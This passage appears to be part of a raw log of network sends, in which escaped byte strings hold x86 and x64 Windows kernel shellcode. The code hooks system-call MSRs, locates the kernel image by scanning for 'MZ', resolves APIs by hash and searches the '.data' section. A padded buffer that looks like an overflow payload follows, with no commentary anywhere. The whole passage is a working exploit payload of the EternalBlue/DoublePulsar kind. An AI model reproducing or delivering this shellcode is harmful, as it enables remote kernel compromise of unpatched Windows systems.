\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 18, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 